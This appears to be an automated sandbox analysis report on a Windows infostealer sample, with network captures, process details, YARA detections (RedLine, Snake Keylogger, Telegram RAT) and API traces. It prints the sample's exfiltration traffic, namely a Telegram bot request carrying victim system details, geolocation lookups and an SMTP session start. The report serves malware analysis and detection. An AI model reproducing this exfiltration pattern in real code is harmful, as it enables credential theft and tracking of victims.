2025-01-10 22:15:38 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862127 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXQ9VWGt%2BsZuvKgR3tiVp%2B6IbF7XEybVoqcWamKe9TRkOWLr2PXR5489ME2fx6x2nmFKhulEAB0mI2ORNFQFjfTHj2Io2y6cRFs%2FCBZfHzRzVpZ6GxT1bh1Rrxd60humhJxfqnyR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006de9e8542d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1640&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1582655&cwnd=229&unsent_bytes=0&cid=ce6fb32031c4cc84&ts=162&x=0"
2025-01-10 22:15:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49743	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:15:39 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862128 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILJfngrUbP7s9Tbm%2FMHh4WAEz6yCfs%2BEUfod%2FgcOMxS9Pk6Nw1oxkVJ96GmfvorI3mBhh1aUY9MGu6LAG1b3wwLPMuvZ0hle5NxH%2Fq61knx10NWQP1x65X0T%2BQo0Lwp63Q77ZQ%2Fd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006e5792843ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1778&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1632196&cwnd=228&unsent_bytes=0&cid=bf13e8634f4de0fb&ts=165&x=0"
2025-01-10 22:15:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49755	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:15:40 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862129 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R6wZQIwrMwVMBDvEbmhrJLdSNrDN4ot%2Fsx2G3Q39ISmbmvoBI7JgBZQbqt%2BrGKk2ThEdh0jZZ0baaVNTZcuw8trGX6G8Er1HdXCuvq7oKMFvUhB4SChL11kzXn1XUgQXsYDxyL0T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006eccb8043ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1761&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1658148&cwnd=228&unsent_bytes=0&cid=bc6df670ed7bf18d&ts=155&x=0"
2025-01-10 22:15:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49766	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:15:41 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862130 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VzR09SIW49GBH0RzrLK90%2FRcnAFBJlSlgvMXkhnfycEBxcpTDdhjJkmL8LjKHIyStLbOo3ejsy6ujsJwsqMUJVbjPmchi2O5ubh3QsqqlI1uZZEg%2Fh44CZ%2F%2FmP1tc9yrH74zURSm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006f3c80a0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1496&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1951871&cwnd=231&unsent_bytes=0&cid=9a94b551f0c70c85&ts=150&x=0"
2025-01-10 22:15:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49775	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:42 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:15:42 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862131 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2JhYEpbhZkpuZyeew1MEyNQePgvAggffAHThiOnst8zzLNY13obNy3CoIASinYhUmzrXVc4j21pzdfrk%2Biq0OWuSUqRYAvCJjY%2FCF8RcaqD6Q6eDjh69%2FC0nAUVx0PoFyZ3haYF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900006fadab08c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1880&min_rtt=1875&rtt_var=713&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1524804&cwnd=223&unsent_bytes=0&cid=aef83eef1904b442&ts=155&x=0"
2025-01-10 22:15:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49786	104.21.80.1	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:15:43 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:15:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1862132 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dvdKE49q%2FrhbpEvR5ByjR6JbpShu55boO%2FXT18n7IaP692LpaeJt2z2EdqNULi9tuPZweku6XP%2BwSFIml9uOCmrtLmCjIncidBiPF9p5fviv0VX%2BAbJsskrzZB3JI%2Fnx1F4Lgyx9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90000701ace77d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1949&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1425085&cwnd=244&unsent_bytes=0&cid=4b46d6a8ed411016&ts=150&x=0"
2025-01-10 22:15:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49792	149.154.167.220	443	1708	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:15:44 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:10:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 22:15:44 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:15:44 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:15:44 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 10, 2025 23:15:52.528008938 CET	587	49830	166.62.28.135	192.168.2.5	220-sg2plzcpnl506897.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 10 Jan 2025 15:15:52 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 10, 2025 23:15:52.528273106 CET	49830	587	192.168.2.5	166.62.28.135	EHLO 358075
Jan 10, 2025 23:15:52.846332073 CET	587	49830	166.62.28.135	192.168.2.5	250-sg2plzcpnl506897.prod.sin2.secureserver.net Hello 358075 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 10, 2025 23:15:52.846765041 CET	49830	587	192.168.2.5	166.62.28.135	STARTTLS
Jan 10, 2025 23:15:53.241291046 CET	587	49830	166.62.28.135	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	17:15:22
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\C5JLkBS1CX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\C5JLkBS1CX.exe"
Imagebase:	0x5e0000
File size:	1'170'432 bytes
MD5 hash:	65190CA2CA5F79E9F61CC56883158455
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2153263594.0000000000EF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:15:26
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\C5JLkBS1CX.exe"
Imagebase:	0x340000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:15:26
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\C5JLkBS1CX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\C5JLkBS1CX.exe"
Imagebase:	0x5e0000
File size:	1'170'432 bytes
MD5 hash:	65190CA2CA5F79E9F61CC56883158455
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.2185993029.0000000003750000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:15:28
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\C5JLkBS1CX.exe"
Imagebase:	0x8e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.4580969067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	175

Executed Functions

Function 005E3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005E3B68
IsDebuggerPresent.KERNEL32 ref: 005E3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,006A52F8,006A52E0,?,?), ref: 005E3BEB

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

Part of subcall function 005F092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005E3C14,006A52F8,?,?,?), ref: 005F096E

SetCurrentDirectoryW.KERNEL32(?), ref: 005E3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00697770,00000010), ref: 0061D281
SetCurrentDirectoryW.KERNEL32(?,006A52F8,?,?,?), ref: 0061D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00694260,006A52F8,?,?,?), ref: 0061D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0061D346

Part of subcall function 005E3A46: GetSysColorBrush.USER32(0000000F), ref: 005E3A50
Part of subcall function 005E3A46: LoadCursorW.USER32(00000000,00007F00), ref: 005E3A5F
Part of subcall function 005E3A46: LoadIconW.USER32(00000063), ref: 005E3A76
Part of subcall function 005E3A46: LoadIconW.USER32(000000A4), ref: 005E3A88
Part of subcall function 005E3A46: LoadIconW.USER32(000000A2), ref: 005E3A9A
Part of subcall function 005E3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005E3AC0
Part of subcall function 005E3A46: RegisterClassExW.USER32(?), ref: 005E3B16

Part of subcall function 005E39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005E3A03
Part of subcall function 005E39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005E3A24
Part of subcall function 005E39D5: ShowWindow.USER32(00000000,?,?), ref: 005E3A38
Part of subcall function 005E39D5: ShowWindow.USER32(00000000,?,?), ref: 005E3A41

Part of subcall function 005E434A: _memset.LIBCMT ref: 005E4370
Part of subcall function 005E434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005E4415

Strings

This is a third-party compiled AutoIt script., xrefs: 0061D279
